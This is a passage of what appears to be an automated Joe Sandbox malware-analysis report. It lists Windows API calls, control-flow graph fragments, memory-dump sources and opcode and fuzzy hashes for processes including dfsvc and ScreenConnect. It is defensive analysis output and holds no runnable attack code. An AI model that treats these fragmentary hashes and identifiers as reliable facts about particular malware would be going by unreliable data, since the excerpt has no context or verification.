                                                                                                                                                                                                                                                          • Opcode ID: 238b0ce9a6aa746b1bd0e5b0612f7f86b8f0ba90063a034004a915500267c824
                                                                                                                                                                                                                                                          • Instruction ID: 09f7168d81e9a161deba27726b109f08120d5ccc9fc30c1e3ffd18b5fbd96e52
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 238b0ce9a6aa746b1bd0e5b0612f7f86b8f0ba90063a034004a915500267c824
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AE04F30684304BBEF212B61EC06FFA3F98EB10B51F504460F90EE80E1EBF1E9549A44
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00BB5784,00000000,00000000,00000000,00000000,?,00BB5981,00000006,FlsSetValue), ref: 00BB580F
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00BB5784,00000000,00000000,00000000,00000000,?,00BB5981,00000006,FlsSetValue,00BBC4D8,FlsSetValue,00000000,00000364,?,00BB44F6), ref: 00BB581B
                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BB5784,00000000,00000000,00000000,00000000,?,00BB5981,00000006,FlsSetValue,00BBC4D8,FlsSetValue,00000000), ref: 00BB5829
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                                          • Opcode ID: c5cdd05f46d2544fea0048b06e1ca686d92e0203c6ddd56504639fef4b10c35d
                                                                                                                                                                                                                                                          • Instruction ID: d0944dd6a2a0d47c8136ee5f82e03c9ef17792dcc12e9958297fcdc5be0c57d5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5cdd05f46d2544fea0048b06e1ca686d92e0203c6ddd56504639fef4b10c35d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C018F32605A22ABC7315A69EC84FB77BD8EF05BA1B600664F91AD7140DFE0D800C6E1
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4A27
                                                                                                                                                                                                                                                            • Part of subcall function 00BB474D: IsProcessorFeaturePresent.KERNEL32(00000017,00BB473C,00000000,?,00000004,00000000,?,?,?,?,00BB4749,00000000,00000000,00000000,00000000,00000000), ref: 00BB474F
                                                                                                                                                                                                                                                            • Part of subcall function 00BB474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00BB4771
                                                                                                                                                                                                                                                            • Part of subcall function 00BB474D: TerminateProcess.KERNEL32(00000000), ref: 00BB4778
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                                                                                                          • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                          • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                          • Instruction ID: 8745645be4033c79791a47720aec1a136f64373c6f158a80951d6ec184ef6bbc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E514D75E00219AFDB14DFA9C881AFEBBF5FF58314F2441A9E454A7342E7B19A018B50
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: GetLastError.KERNEL32(00000008,?,00BB6D69,?,?,?,00BC04C8,0000002C,00BB3F34,00000016,00BB209F,00BB1AFC), ref: 00BB4428
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: _free.LIBCMT ref: 00BB445B
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: SetLastError.KERNEL32(00000000), ref: 00BB449C
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4424: _abort.LIBCMT ref: 00BB44A2
                                                                                                                                                                                                                                                          • _abort.LIBCMT ref: 00BB527B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB52AF
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast_abort_free
                                                                                                                                                                                                                                                          • String ID: (?z
                                                                                                                                                                                                                                                          • API String ID: 289325740-554794068
                                                                                                                                                                                                                                                          • Opcode ID: 06972be4f5f6f8307b187193715a92f25602e69ad679fb0999c4f22a34735e94
                                                                                                                                                                                                                                                          • Instruction ID: 12abbc4a5b54bb7d18b870f59f7371308c3bb54edc6815b71f6e51a19d6f30e2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06972be4f5f6f8307b187193715a92f25602e69ad679fb0999c4f22a34735e94
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC016531D02E219BCB759F6C94017BDB3E0EF49720B154689E95077292CBF06D518FC2
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CommandLine
                                                                                                                                                                                                                                                          • String ID: `%y
                                                                                                                                                                                                                                                          • API String ID: 3253501508-1992035149
                                                                                                                                                                                                                                                          • Opcode ID: e12594ccadd7c2a3c338f711b4bf198001aa04accb373cd55804f7ad053879ae
                                                                                                                                                                                                                                                          • Instruction ID: fba97c680557f35cc8ab727c43824ccd037f4ca364b760416971bf5423cb3d8c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e12594ccadd7c2a3c338f711b4bf198001aa04accb373cd55804f7ad053879ae
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41B048B89002818B8700AF2AA948C993BA0A7492023C00965D82693231EFB800889A00

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:20.7%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:9
                                                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                                                          execution_graph 4782 7ffe7dd41794 4784 7ffe7dd4179f LoadLibraryExW 4782->4784 4785 7ffe7dd41836 4784->4785 4786 7ffe7dd415e2 4787 7ffe7dd9b660 CreateUrlCacheEntryW 4786->4787 4789 7ffe7dd9b826 4787->4789 4779 7ffe7dd49aa7 4780 7ffe7dd49ab4 CreateFileW 4779->4780 4781 7ffe7dd49b2c 4780->4781

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2259030651.00007FFE7DD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffe7dd40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CacheCreateEntry
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3741994674-0
                                                                                                                                                                                                                                                          • Opcode ID: 17ae5cc1195a009b7c013923e5c1640cc0baed6de88ec2d03ce4ac48187798a2
                                                                                                                                                                                                                                                          • Instruction ID: e9f487383770c38f7c9e1d36fecfc1d4b49ba7f7ba413a0bda25449abb6ad13b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17ae5cc1195a009b7c013923e5c1640cc0baed6de88ec2d03ce4ac48187798a2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15819E31918A4D8FEBA8DF18C8857F97BE0FF58311F01432AE85DC72A1DB75A9458B81

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 32 7ffe7dd41794-7ffe7dd417f8 36 7ffe7dd41802-7ffe7dd41834 LoadLibraryExW 32->36 37 7ffe7dd417fa-7ffe7dd417ff 32->37 38 7ffe7dd41836 36->38 39 7ffe7dd4183c-7ffe7dd41863 36->39 37->36 38->39
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2259030651.00007FFE7DD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffe7dd40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                          • Opcode ID: b973e10bdf78d6b155d11407ba37f2eb7afeba8f7f9d3e59a5c0a824aac8f88d
                                                                                                                                                                                                                                                          • Instruction ID: 70fac12d2889c4fdc93a0d9268a80c7fc3849d884f8504fa1b84d9987ef2c935
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b973e10bdf78d6b155d11407ba37f2eb7afeba8f7f9d3e59a5c0a824aac8f88d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E31913190CA1C9FDB69DB9884496EABBE0FF65321F04422BD009D3651DB75A806CB91

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 50 7ffe7dd415b2-7ffe7dd417f8 54 7ffe7dd41802-7ffe7dd41834 LoadLibraryExW 50->54 55 7ffe7dd417fa-7ffe7dd417ff 50->55 56 7ffe7dd41836 54->56 57 7ffe7dd4183c-7ffe7dd41863 54->57 55->54 56->57
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2259030651.00007FFE7DD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffe7dd40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                          • Opcode ID: 66b564fd4e13abae3245fa8573304ed10b4cf49d65038291443bbf0fb7f65cff
                                                                                                                                                                                                                                                          • Instruction ID: bf16c0bbab3734183e854f2a864fabea14a383ee41835454451146e32e52f4b1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66b564fd4e13abae3245fa8573304ed10b4cf49d65038291443bbf0fb7f65cff
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4218131908A1C9FDB59DB58C449BFABBE0FF65311F14422FD009D3651DB71A8068B91

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 41 7ffe7dd41492-7ffe7dd417f8 45 7ffe7dd41802-7ffe7dd41834 LoadLibraryExW 41->45 46 7ffe7dd417fa-7ffe7dd417ff 41->46 47 7ffe7dd41836 45->47 48 7ffe7dd4183c-7ffe7dd41863 45->48 46->45 47->48
                                                                                                                                                                                                                                                          APIs

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 152 7ffe7dd49aa7-7ffe7dd49b2a CreateFileW 154 7ffe7dd49b32-7ffe7dd49b65 152->154 155 7ffe7dd49b2c 152->155 155->154
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2259030651.00007FFE7DD40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD40000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffe7dd40000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                                          • Opcode ID: fee737b301586670db3a64499b1af0bac09010b9fb549f36b0cabaaa9a3a491f
                                                                                                                                                                                                                                                          • Instruction ID: 145273f7e2aa08d51358b965edae36239531806735ea3ae7743fec61b60d77e1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fee737b301586670db3a64499b1af0bac09010b9fb549f36b0cabaaa9a3a491f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4521AC30A0CA588FDB58DF1CE445BA9BBE0FB59324F14429FE04DD3662CB35A941CB85
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2258516606.00007FFE7DC2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DC2D000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffe7dc2d000_dfsvc.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: da7ff63669a98a44ace7868a8532236594e2bc6ffeb4c2fc3223cdf9b437b599
                                                                                                                                                                                                                                                          • Instruction ID: f177c3c2f29503513175398a0f7d3cc593bb11639d6eec3da108bf33218abcae
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da7ff63669a98a44ace7868a8532236594e2bc6ffeb4c2fc3223cdf9b437b599
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74111F7251CF088F9BA8EF1DE48595677E0FB98320B10465FE459C7665D731F881CB82

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:8.3%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:9
                                                                                                                                                                                                                                                          Total number of Limit Nodes:0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1754221133.00007FFE7DD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD50000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffe7dd50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5e52933136d5c9297f66986cc57b8603aa2d7c46d6ada6995257914c78312c8c
                                                                                                                                                                                                                                                          • Instruction ID: 74efb4363369151ca8478e800e6e8e4e21fbc6d45e89dd08d51eea1533ffef61
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e52933136d5c9297f66986cc57b8603aa2d7c46d6ada6995257914c78312c8c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB31E43191CB188FDB18DF5C98466FD7BE0EBA9311F00433EE08AD3251DB75A8068B82

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 8 7ffe7dd54982-7ffe7dd6f2d5 GetTokenInformation 12 7ffe7dd6f2dd-7ffe7dd6f30e 8->12 13 7ffe7dd6f2d7 8->13 13->12
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1754221133.00007FFE7DD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD50000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffe7dd50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InformationToken
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4114910276-0
                                                                                                                                                                                                                                                          • Opcode ID: afb379193eef9de25182b27ca47b7115668882f2ce0e4850feeef67c538f70e0
                                                                                                                                                                                                                                                          • Instruction ID: 2bbf4209357ac5794d06ce94f88d760e3d59d93387f8e5760cb0048ea32c2a46
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afb379193eef9de25182b27ca47b7115668882f2ce0e4850feeef67c538f70e0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7831B17191CB188FDB18DF5C98466FD77E0EBA9325F00422EE08AD3251DB74A8068B92

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 15 7ffe7dd53e9a-7ffe7dd58550 SetProcessMitigationPolicy 18 7ffe7dd58552 15->18 19 7ffe7dd58558-7ffe7dd58587 15->19 18->19
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1754221133.00007FFE7DD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD50000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffe7dd50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                                          • Opcode ID: 9cef9842808dfcb1bbc79eac54ce1f94e3f4fc7b3ed3ace4f16c4a75ba3f0f2a
                                                                                                                                                                                                                                                          • Instruction ID: 44d7b75cf25eba0ca7ee5053d3cb6135de89707c160a94cef8c599ffdbfbf905
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cef9842808dfcb1bbc79eac54ce1f94e3f4fc7b3ed3ace4f16c4a75ba3f0f2a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8221F73191CB188FDB289F9C984A5F977E0EB69711F00422FE44AD3211DB70B8458B81

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 21 7ffe7dd53dea-7ffe7dd6f4e9 CloseHandle 24 7ffe7dd6f4f1-7ffe7dd6f51f 21->24 25 7ffe7dd6f4eb 21->25 25->24
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1754221133.00007FFE7DD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DD50000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffe7dd50000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: nCwq$
                                                                                                                                                                                                                                                          • API String ID: 0-3800751292
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $_q$$_q
                                                                                                                                                                                                                                                          • API String ID: 0-458585787
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: (cq
                                                                                                                                                                                                                                                          • API String ID: 0-301743287
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: LR_q
                                                                                                                                                                                                                                                          • API String ID: 0-2241839734
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: (cq
                                                                                                                                                                                                                                                          • API String ID: 0-301743287
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ['
                                                                                                                                                                                                                                                          • API String ID: 0-410297704
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: V
                                                                                                                                                                                                                                                          • API String ID: 0-1342839628
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID: V
• API String ID: 0-1342839628
                                                                                                                                                                                                                                                          • Opcode ID: d78555a5b7d860a7ec4bea5066f0f3db033b320fbf78eed4d489420832a41876
                                                                                                                                                                                                                                                          • Instruction ID: d37abb27149af1a2c0971c3302592acb373b131df38f74dbe44a2ed41491ce79
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d78555a5b7d860a7ec4bea5066f0f3db033b320fbf78eed4d489420832a41876
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0E01B3155D3919FC342DF349D55545BFF0AB46600F0984EED588C7652D735AC0ACB93
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1733864937.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_16c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1c4128783ef06e492d55f82d47f507bede81f3bfa384f63d14ff3b8389eeb250
                                                                                                                                                                                                                                                          • Instruction ID: 5173958c4eb5bbb3217f325849f7261402c15cdffbac03fe98ad9eada3f202d2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c4128783ef06e492d55f82d47f507bede81f3bfa384f63d14ff3b8389eeb250
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9714232E043858FD702CB78DD58BDCBFB1EF46310F15819AD000AB2A9EB799949CB61
